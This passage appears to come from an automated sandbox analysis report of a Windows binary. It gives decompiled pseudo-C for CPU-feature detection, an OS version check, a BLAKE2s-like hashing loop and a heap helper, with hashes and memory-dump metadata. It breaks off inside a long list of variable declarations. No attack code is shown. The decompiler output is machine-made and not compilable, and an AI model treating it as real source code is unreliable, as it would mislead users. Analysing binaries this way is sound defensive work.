                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise
                                                    • String ID:
                                                    • API String ID: 3997070919-0
                                                    • Opcode ID: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                    • Instruction ID: 2a87a58a3597d47af7608b2016e9adef07123fdc4329ba587f160e8839ab1b72
                                                    • Opcode Fuzzy Hash: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                    • Instruction Fuzzy Hash: 57B16E71210608DFD755CF28C48AB657BE0FF45364F298658EEAACF2A1C335DA92CB41
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 88%
                                                    			E00CDF654(signed int __edx) {
                                                    				signed int _v8;
                                                    				signed int _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v24;
                                                    				signed int _v28;
                                                    				signed int _v32;
                                                    				signed int _v36;
                                                    				signed int _v40;
                                                    				intOrPtr _t60;
                                                    				signed int _t61;
                                                    				signed int _t62;
                                                    				signed int _t63;
                                                    				signed int _t66;
                                                    				signed int _t67;
                                                    				signed int _t73;
                                                    				intOrPtr _t74;
                                                    				intOrPtr _t75;
                                                    				intOrPtr* _t77;
                                                    				signed int _t78;
                                                    				intOrPtr* _t82;
                                                    				signed int _t85;
                                                    				signed int _t90;
                                                    				intOrPtr* _t93;
                                                    				signed int _t96;
                                                    				signed int _t104;
                                                    
                                                    				_t90 = __edx;
                                                    				 *0xd21d20 =  *0xd21d20 & 0x00000000;
                                                    				 *0xcfe7a0 =  *0xcfe7a0 | 0x00000001;
                                                    				if(IsProcessorFeaturePresent(0xa) == 0) {
                                                    					L23:
                                                    					return 0;
                                                    				}
                                                    				_v20 = _v20 & 0x00000000;
                                                    				_push(_t74);
                                                    				_t93 =  &_v40;
                                                    				asm("cpuid");
                                                    				_t75 = _t74;
                                                    				 *_t93 = 0;
                                                    				 *((intOrPtr*)(_t93 + 4)) = _t74;
                                                    				 *((intOrPtr*)(_t93 + 8)) = 0;
                                                    				 *(_t93 + 0xc) = _t90;
                                                    				_v16 = _v40;
                                                    				_v8 = _v28 ^ 0x49656e69;
                                                    				_v12 = _v32 ^ 0x6c65746e;
                                                    				_push(_t75);
                                                    				asm("cpuid");
                                                    				_t77 =  &_v40;
                                                    				 *_t77 = 1;
                                                    				 *((intOrPtr*)(_t77 + 4)) = _t75;
                                                    				 *((intOrPtr*)(_t77 + 8)) = 0;
                                                    				 *(_t77 + 0xc) = _t90;
                                                    				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
                                                    					L9:
                                                    					_t96 =  *0xd21d24;
                                                    					L10:
                                                    					_t85 = _v32;
                                                    					_t60 = 7;
                                                    					_v8 = _t85;
                                                    					if(_v16 < _t60) {
                                                    						_t78 = _v20;
                                                    					} else {
                                                    						_push(_t77);
                                                    						asm("cpuid");
                                                    						_t82 =  &_v40;
                                                    						 *_t82 = _t60;
                                                    						 *((intOrPtr*)(_t82 + 4)) = _t77;
                                                    						 *((intOrPtr*)(_t82 + 8)) = 0;
                                                    						_t85 = _v8;
                                                    						 *(_t82 + 0xc) = _t90;
                                                    						_t78 = _v36;
                                                    						if((_t78 & 0x00000200) != 0) {
                                                    							 *0xd21d24 = _t96 | 0x00000002;
                                                    						}
                                                    					}
                                                    					_t61 =  *0xcfe7a0; // 0x6f
                                                    					_t62 = _t61 | 0x00000002;
                                                    					 *0xd21d20 = 1;
                                                    					 *0xcfe7a0 = _t62;
                                                    					if((_t85 & 0x00100000) != 0) {
                                                    						_t63 = _t62 | 0x00000004;
                                                    						 *0xd21d20 = 2;
                                                    						 *0xcfe7a0 = _t63;
                                                    						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
                                                    							asm("xgetbv");
                                                    							_v24 = _t63;
                                                    							_v20 = _t90;
                                                    							_t104 = 6;
                                                    							if((_v24 & _t104) == _t104) {
                                                    								_t66 =  *0xcfe7a0; // 0x6f
                                                    								_t67 = _t66 | 0x00000008;
                                                    								 *0xd21d20 = 3;
                                                    								 *0xcfe7a0 = _t67;
                                                    								if((_t78 & 0x00000020) != 0) {
                                                    									 *0xd21d20 = 5;
                                                    									 *0xcfe7a0 = _t67 | 0x00000020;
                                                    									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
                                                    										 *0xcfe7a0 =  *0xcfe7a0 | 0x00000040;
                                                    										 *0xd21d20 = _t104;
                                                    									}
                                                    								}
                                                    							}
                                                    						}
                                                    					}
                                                    					goto L23;
                                                    				}
                                                    				_t73 = _v40 & 0x0fff3ff0;
                                                    				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
                                                    					_t96 =  *0xd21d24 | 0x00000001;
                                                    					 *0xd21d24 = _t96;
                                                    					goto L10;
                                                    				} else {
                                                    					goto L9;
                                                    				}
                                                    			}






























                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDF66A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 2325560087-0
                                                    • Opcode ID: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                    • Instruction ID: 83666db047a09911066ac5868eed1ac2a8c2c3cb20f9695ac21a090ecb0cac47
                                                    • Opcode Fuzzy Hash: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                    • Instruction Fuzzy Hash: 16517E71A00619DFDB28CF54E8817AEB7F4FB58314F24852BD512EB3A1D374AA42CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCB146() {
                                                    				struct _OSVERSIONINFOW _v280;
                                                    				signed int _t6;
                                                    				intOrPtr _t12;
                                                    				intOrPtr _t13;
                                                    
                                                    				_t12 =  *0xcfe020; // 0x2
                                                    				if(_t12 != 0xffffffff) {
                                                    					_t6 =  *0xd010a8;
                                                    					_t13 =  *0xd010ac;
                                                    				} else {
                                                    					_v280.dwOSVersionInfoSize = 0x114;
                                                    					GetVersionExW( &_v280);
                                                    					_t12 = _v280.dwPlatformId;
                                                    					_t6 = _v280.dwMajorVersion;
                                                    					_t13 = _v280.dwMinorVersion;
                                                    					 *0xcfe020 = _t12;
                                                    					 *0xd010a8 = _t6;
                                                    					 *0xd010ac = _t13;
                                                    				}
                                                    				if(_t12 != 2) {
                                                    					return 0x501;
                                                    				} else {
                                                    					return (_t6 << 8) + _t13;
                                                    				}
                                                    			}








                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID:
                                                    • API String ID: 1889659487-0
                                                    • Opcode ID: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                    • Instruction ID: 2361aea24d6c6df7140be6d26e42036374fc59f905605474a7f83d4599c31a12
                                                    • Opcode Fuzzy Hash: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                    • Instruction Fuzzy Hash: 2FF017B9E002188FDB18CB18EC92BE977B2EB88315F544299D519D3390C7B0AE84CE65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 76%
                                                    			E00CC40FE() {
                                                    				signed int* _t187;
                                                    				void* _t190;
                                                    				signed int _t200;
                                                    				signed int _t201;
                                                    				signed int _t202;
                                                    				signed int _t208;
                                                    				signed int _t209;
                                                    				signed int _t210;
                                                    				signed int _t216;
                                                    				signed int _t217;
                                                    				signed int _t224;
                                                    				signed int _t232;
                                                    				signed int _t233;
                                                    				signed int _t234;
                                                    				signed int _t239;
                                                    				signed int _t240;
                                                    				signed int _t245;
                                                    				signed int _t246;
                                                    				signed int _t253;
                                                    				signed int _t254;
                                                    				signed int _t256;
                                                    				signed int _t258;
                                                    				intOrPtr _t259;
                                                    				signed int _t260;
                                                    				signed int _t262;
                                                    				signed int _t263;
                                                    				signed int _t265;
                                                    				signed int _t266;
                                                    				signed int _t272;
                                                    				signed int _t274;
                                                    				signed int _t276;
                                                    				signed int _t278;
                                                    				signed int _t280;
                                                    				signed int _t283;
                                                    				signed int _t286;
                                                    				signed int _t289;
                                                    				signed int _t292;
                                                    				intOrPtr _t295;
                                                    				signed int _t297;
                                                    				signed int _t299;
                                                    				signed int _t301;
                                                    				signed int _t303;
                                                    				signed int _t305;
                                                    				signed int _t306;
                                                    				signed int _t308;
                                                    				signed int _t310;
                                                    				void* _t311;
                                                    				signed int _t320;
                                                    				signed int _t323;
                                                    				signed int _t326;
                                                    				signed int _t328;
                                                    				intOrPtr _t329;
                                                    				signed int _t331;
                                                    				signed int _t332;
                                                    				intOrPtr _t335;
                                                    				signed int _t337;
                                                    				signed int _t339;
                                                    				signed int _t342;
                                                    				signed int _t344;
                                                    				signed int _t345;
                                                    				signed int _t347;
                                                    				signed int _t348;
                                                    				intOrPtr _t349;
                                                    				intOrPtr _t350;
                                                    				signed int _t352;
                                                    				signed int _t353;
                                                    				signed int _t354;
                                                    				intOrPtr _t355;
                                                    				signed int _t356;
                                                    				signed int _t358;
                                                    				signed int _t359;
                                                    				signed int _t361;
                                                    				void* _t362;
                                                    				void* _t363;
                                                    				void* _t364;
                                                    
                                                    				_t295 =  *((intOrPtr*)(_t362 + 0xd0));
                                                    				_t187 =  *(_t295 + 0xf8);
                                                    				_t258 =  *_t187 ^ 0x510e527f;
                                                    				_t352 = _t187[1] ^ 0x9b05688c;
                                                    				_t266 = 0x10;
                                                    				memcpy(_t362 + 0xa0,  *(_t362 + 0xe0), _t266 << 2);
                                                    				_t363 = _t362 + 0xc;
                                                    				_push(8);
                                                    				_t190 = memcpy(_t363 + 0x5c,  *(_t295 + 0xf4), 0 << 2);
                                                    				_t364 = _t363 + 0xc;
                                                    				 *(_t364 + 0x20) =  *_t190 ^ 0x1f83d9ab;
                                                    				_t272 =  *(_t364 + 0x6c);
                                                    				_t335 = 0;
                                                    				 *(_t364 + 0x28) =  *(_t190 + 4) ^ 0x5be0cd19;
                                                    				 *(_t364 + 0x1c) =  *(_t364 + 0x78);
                                                    				 *(_t364 + 0x38) =  *(_t364 + 0x74);
                                                    				 *(_t364 + 0x18) = 0x6a09e667;
                                                    				 *(_t364 + 0x24) = 0xbb67ae85;
                                                    				 *(_t364 + 0x2c) = 0x3c6ef372;
                                                    				 *(_t364 + 0x34) = 0xa54ff53a;
                                                    				 *((intOrPtr*)(_t364 + 0x14)) = 0;
                                                    				 *(_t364 + 0x30) =  *(_t364 + 0x70);
                                                    				 *(_t364 + 0x10) = _t272;
                                                    				do {
                                                    					_t27 = _t335 + 0xcf36c0; // 0x3020100
                                                    					_t31 = _t364 + 0x18; // 0x6a09e667
                                                    					_t320 =  *((intOrPtr*)(_t364 + 0x9c + ( *_t27 & 0x000000ff) * 4)) + _t272 +  *(_t364 + 0x5c);
                                                    					_t297 = _t320 ^ _t258;
                                                    					_t259 =  *((intOrPtr*)(_t364 + 0x14));
                                                    					asm("rol edx, 0x10");
                                                    					_t274 =  *_t31 + _t297;
                                                    					_t337 = _t274 ^  *(_t364 + 0x10);
                                                    					asm("ror esi, 0xc");
                                                    					_t200 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c1) & 0x000000ff) * 4)) + _t337 + _t320;
                                                    					 *(_t364 + 0x18) = _t200;
                                                    					_t201 = _t200 ^ _t297;
                                                    					asm("ror eax, 0x8");
                                                    					 *(_t364 + 0x3c) = _t201;
                                                    					_t202 = _t201 + _t274;
                                                    					 *(_t364 + 0x48) = _t202;
                                                    					asm("ror eax, 0x7");
                                                    					 *(_t364 + 0x50) = _t202 ^ _t337;
                                                    					_t323 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c2) & 0x000000ff) * 4)) +  *(_t364 + 0x30) +  *(_t364 + 0x60);
                                                    					_t299 = _t323 ^ _t352;
                                                    					_t353 =  *(_t364 + 0x38);
                                                    					asm("rol edx, 0x10");
                                                    					_t276 =  *(_t364 + 0x24) + _t299;
                                                    					_t339 = _t276 ^  *(_t364 + 0x30);
                                                    					asm("ror esi, 0xc");
                                                    					_t208 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c3) & 0x000000ff) * 4)) + _t339 + _t323;
                                                    					 *(_t364 + 0x10) = _t208;
                                                    					_t209 = _t208 ^ _t299;
                                                    					asm("ror eax, 0x8");
                                                    					 *(_t364 + 0x44) = _t209;
                                                    					_t210 = _t209 + _t276;
                                                    					 *(_t364 + 0x58) = _t210;
                                                    					asm("ror eax, 0x7");
                                                    					 *(_t364 + 0x24) = _t210 ^ _t339;
                                                    					_t342 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c4) & 0x000000ff) * 4)) + _t353 +  *(_t364 + 0x64);
                                                    					_t301 = _t342 ^  *(_t364 + 0x20);
                                                    					asm("rol edx, 0x10");
                                                    					_t278 =  *(_t364 + 0x2c) + _t301;
                                                    					_t354 = _t353 ^ _t278;
                                                    					asm("ror ebp, 0xc");
                                                    					_t216 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xcf36c5) & 0x000000ff) * 4)) + _t354 + _t342;
                                                    					 *(_t364 + 0x40) = _t216;
                                                    					_t217 = _t216 ^ _t301;
                                                    					asm("ror eax, 0x8");
                                                    					 *(_t364 + 0x54) = _t217;
                                                    					_t260 = _t217 + _t278;
                                                    					_t355 =  *((intOrPtr*)(_t364 + 0x14));
                                                    					asm("ror eax, 0x7");
                                                    					 *(_t364 + 0x20) = _t260 ^ _t354;
                                                    					_t326 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xcf36c6) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x68);
                                                    					_t303 = _t326 ^  *(_t364 + 0x28);
                                                    					asm("rol edx, 0x10");
                                                    					_t280 =  *(_t364 + 0x34) + _t303;
                                                    					_t344 = _t280 ^  *(_t364 + 0x1c);
                                                    					asm("ror esi, 0xc");
                                                    					_t224 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xcf36c7) & 0x000000ff) * 4)) + _t344 + _t326;
                                                    					 *(_t364 + 0x4c) = _t224;
                                                    					_t328 = _t224 ^ _t303;
                                                    					asm("ror edi, 0x8");
                                                    					_t356 = _t328 + _t280;
                                                    					asm("ror eax, 0x7");
                                                    					 *(_t364 + 0x1c) = _t356 ^ _t344;
                                                    					_t98 = _t364 + 0x18; // 0x6a09e667
                                                    					_t283 =  *((intOrPtr*)(_t364 + 0x9c + ( *( *((intOrPtr*)(_t364 + 0x14)) + 0xcf36c8) & 0x000000ff) * 4)) +  *(_t364 + 0x24) +  *_t98;
                                                    					_t305 = _t283 ^ _t328;
                                                    					_t329 =  *((intOrPtr*)(_t364 + 0x14));
                                                    					asm("rol edx, 0x10");
                                                    					_t345 = _t305 + _t260;
                                                    					_t262 = _t345 ^  *(_t364 + 0x24);
                                                    					asm("ror ebx, 0xc");
                                                    					_t232 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36c9) & 0x000000ff) * 4)) + _t262 + _t283;
                                                    					 *(_t364 + 0x5c) = _t232;
                                                    					_t233 = _t232 ^ _t305;
                                                    					asm("ror eax, 0x8");
                                                    					 *(_t364 + 0x28) = _t233;
                                                    					 *(_t364 + 0x98) = _t233;
                                                    					_t234 = _t233 + _t345;
                                                    					_t263 = _t262 ^ _t234;
                                                    					 *(_t364 + 0x2c) = _t234;
                                                    					 *(_t364 + 0x84) = _t234;
                                                    					asm("ror ebx, 0x7");
                                                    					 *(_t364 + 0x30) = _t263;
                                                    					 *(_t364 + 0x70) = _t263;
                                                    					_t286 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36ca) & 0x000000ff) * 4)) +  *(_t364 + 0x20) +  *(_t364 + 0x10);
                                                    					_t265 = _t286 ^  *(_t364 + 0x3c);
                                                    					asm("rol ebx, 0x10");
                                                    					_t306 = _t265 + _t356;
                                                    					_t358 = _t306 ^  *(_t364 + 0x20);
                                                    					asm("ror ebp, 0xc");
                                                    					_t239 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36cb) & 0x000000ff) * 4)) + _t358 + _t286;
                                                    					_t258 = _t265 ^ _t239;
                                                    					 *(_t364 + 0x60) = _t239;
                                                    					asm("ror ebx, 0x8");
                                                    					_t240 = _t306 + _t258;
                                                    					_t359 = _t358 ^ _t240;
                                                    					 *(_t364 + 0x34) = _t240;
                                                    					 *(_t364 + 0x88) = _t240;
                                                    					asm("ror ebp, 0x7");
                                                    					 *(_t364 + 0x38) = _t359;
                                                    					 *(_t364 + 0x74) = _t359;
                                                    					_t289 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36cc) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x40);
                                                    					_t361 = _t289 ^  *(_t364 + 0x44);
                                                    					asm("rol ebp, 0x10");
                                                    					_t308 =  *(_t364 + 0x48) + _t361;
                                                    					_t347 = _t308 ^  *(_t364 + 0x1c);
                                                    					asm("ror esi, 0xc");
                                                    					_t245 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36cd) & 0x000000ff) * 4)) + _t347 + _t289;
                                                    					_t352 = _t361 ^ _t245;
                                                    					 *(_t364 + 0x64) = _t245;
                                                    					asm("ror ebp, 0x8");
                                                    					_t246 = _t308 + _t352;
                                                    					_t348 = _t347 ^ _t246;
                                                    					 *(_t364 + 0x18) = _t246;
                                                    					 *(_t364 + 0x7c) = _t246;
                                                    					asm("ror esi, 0x7");
                                                    					 *(_t364 + 0x1c) = _t348;
                                                    					 *(_t364 + 0x78) = _t348;
                                                    					_t292 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xcf36ce) & 0x000000ff) * 4)) +  *(_t364 + 0x4c) +  *(_t364 + 0x50);
                                                    					_t349 =  *((intOrPtr*)(_t364 + 0x14));
                                                    					_t331 = _t292 ^  *(_t364 + 0x54);
                                                    					asm("rol edi, 0x10");
                                                    					_t310 =  *(_t364 + 0x58) + _t331;
                                                    					asm("ror eax, 0xc");
                                                    					 *(_t364 + 0x10) = _t310 ^  *(_t364 + 0x50);
                                                    					_t335 = _t349 + 0x10;
                                                    					 *((intOrPtr*)(_t364 + 0x14)) = _t335;
                                                    					_t253 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t349 + 0xcf36cf) & 0x000000ff) * 4)) +  *(_t364 + 0x10) + _t292;
                                                    					_t332 = _t331 ^ _t253;
                                                    					 *(_t364 + 0x68) = _t253;
                                                    					asm("ror edi, 0x8");
                                                    					 *(_t364 + 0x20) = _t332;
                                                    					 *(_t364 + 0x94) = _t332;
                                                    					_t254 = _t310 + _t332;
                                                    					_t272 =  *(_t364 + 0x10) ^ _t254;
                                                    					 *(_t364 + 0x24) = _t254;
                                                    					asm("ror ecx, 0x7");
                                                    					 *(_t364 + 0x80) = _t254;
                                                    					 *(_t364 + 0x10) = _t272;
                                                    					 *(_t364 + 0x6c) = _t272;
                                                    				} while (_t335 <= 0x90);
                                                    				_t350 =  *((intOrPtr*)(_t364 + 0xe0));
                                                    				_t311 = 0;
                                                    				 *(_t364 + 0x8c) = _t258;
                                                    				 *(_t364 + 0x90) = _t352;
                                                    				do {
                                                    					_t256 =  *(_t364 + _t311 + 0x7c) ^  *(_t364 + _t311 + 0x5c);
                                                    					 *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) =  *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) ^ _t256;
                                                    					_t311 = _t311 + 4;
                                                    				} while (_t311 < 0x20);
                                                    				return _t256;
                                                    			}


                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gj
                                                    • API String ID: 0-4203073231
                                                    • Opcode ID: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                    • Instruction ID: 39a2e00acb3e5a61890bda591f7188c1e9de8ea5b1207a5729ef8bdd1c913831
                                                    • Opcode Fuzzy Hash: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                    • Instruction Fuzzy Hash: D4C13676A183818FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E945CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CEC030() {
                                                    				signed int _t3;
                                                    
                                                    				_t3 = GetProcessHeap();
                                                    				 *0xd226e4 = _t3;
                                                    				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                    			}

                                                    0x00cec030
                                                    0x00cec038
                                                    0x00cec040

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                    • Instruction ID: 78d51fb1f0f409f87f5c6f2f30d8997644efc37af6cb556811808d24b56f4975
                                                    • Opcode Fuzzy Hash: 0a7f4842a08ff4a46c05381a3101d5dd96c6c45d86c2c801a0a304ea5388d078
                                                    • Instruction Fuzzy Hash: F1A02230203300FFC300CF30AF0CB2C3BE8AA283E2308802AB008C0230EB3080A0EB02
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 96%
                                                    			E00CD62CA(intOrPtr __esi) {
                                                    				signed int _t344;
                                                    				signed int _t345;
                                                    				signed int _t346;
                                                    				signed int _t348;
                                                    				signed int _t349;
                                                    				signed int _t350;
                                                    				signed int _t351;
                                                    				signed int _t352;
                                                    				signed int _t353;
                                                    				signed int _t355;
                                                    				signed int _t356;
                                                    				signed int _t357;
                                                    				void* _t359;
                                                    				signed int _t361;
                                                    				intOrPtr _t363;
                                                    				signed int _t372;
                                                    				char _t381;
                                                    				void* _t385;
                                                    				signed int _t386;
                                                    				signed int _t387;
                                                    				intOrPtr _t389;
                                                    				signed int _t399;
                                                    				char _t408;
                                                    				unsigned int _t409;
                                                    				void* _t417;
                                                    				signed int _t418;
                                                    				signed int _t419;
                                                    				intOrPtr _t421;
                                                    				signed int _t424;
                                                    				char _t433;
                                                    				signed int _t436;
                                                    				signed int _t438;
                                                    				signed int _t441;
                                                    				signed int _t442;
                                                    				signed int _t443;
                                                    				signed int _t444;
                                                    				signed int _t447;
                                                    				signed int _t448;
                                                    				signed short _t449;
                                                    				signed int _t450;
                                                    				signed int _t454;
                                                    				unsigned int _t459;
                                                    				signed int _t463;
                                                    				signed int _t464;
                                                    				signed int _t465;
                                                    				signed int _t468;
                                                    				signed int _t469;
                                                    				signed short _t470;
                                                    				unsigned int _t475;
                                                    				signed int _t480;
                                                    				unsigned int _t482;
                                                    				signed int _t496;
                                                    				signed int _t499;
                                                    				signed int _t501;
                                                    				signed int _t504;
                                                    				signed int _t506;
                                                    				signed int _t508;
                                                    				signed int _t510;
                                                    				intOrPtr* _t512;
                                                    				intOrPtr* _t513;
                                                    				signed int _t514;
                                                    				intOrPtr* _t515;
                                                    				signed int _t516;
                                                    				signed int _t522;
                                                    				signed int _t524;
                                                    				signed int* _t525;
                                                    				intOrPtr _t526;
                                                    				void* _t529;
                                                    				signed int _t532;
                                                    				signed int* _t535;
                                                    				unsigned int _t538;
                                                    				signed int _t539;
                                                    				void* _t540;
                                                    				signed int _t543;
                                                    				signed int _t545;
                                                    				signed int _t548;
                                                    				signed int _t551;
                                                    				signed int _t554;
                                                    				void* _t556;
                                                    				signed int _t559;
                                                    				signed int _t560;
                                                    				intOrPtr* _t562;
                                                    				void* _t563;
                                                    				signed int _t565;
                                                    				signed int _t568;
                                                    				unsigned int _t575;
                                                    				signed int _t576;
                                                    				void* _t577;
                                                    				signed int _t580;
                                                    				void* _t583;
                                                    				signed int _t586;
                                                    				signed int _t589;
                                                    				signed int _t591;
                                                    				void* _t593;
                                                    				signed int _t596;
                                                    				intOrPtr* _t598;
                                                    				void* _t599;
                                                    				signed int _t602;
                                                    				void* _t605;
                                                    				signed int _t609;
                                                    				signed int _t610;
                                                    				intOrPtr* _t612;
                                                    				void* _t613;
                                                    				void* _t616;
                                                    				signed int _t619;
                                                    				intOrPtr* _t625;
                                                    				void* _t626;
                                                    				unsigned int _t633;
                                                    				signed int _t636;
                                                    				signed int _t637;
                                                    				unsigned int _t639;
                                                    				signed int _t642;
                                                    				void* _t645;
                                                    				signed int _t646;
                                                    				void* _t649;
                                                    				signed int _t650;
                                                    				signed int _t651;
                                                    				void* _t654;
                                                    				unsigned int _t656;
                                                    				unsigned int _t660;
                                                    				signed int _t663;
                                                    				signed int _t665;
                                                    				unsigned int _t666;
                                                    				signed int _t668;
                                                    				signed int _t669;
                                                    				signed int _t670;
                                                    				signed int _t671;
                                                    				signed short _t672;
                                                    				signed int _t673;
                                                    				signed int _t674;
                                                    				unsigned int _t678;
                                                    				signed int _t680;
                                                    				intOrPtr _t684;
                                                    				signed int _t686;
                                                    				signed int _t687;
                                                    				signed int _t688;
                                                    				signed int* _t689;
                                                    				char* _t692;
                                                    				char* _t693;
                                                    				signed int _t696;
                                                    				void* _t697;
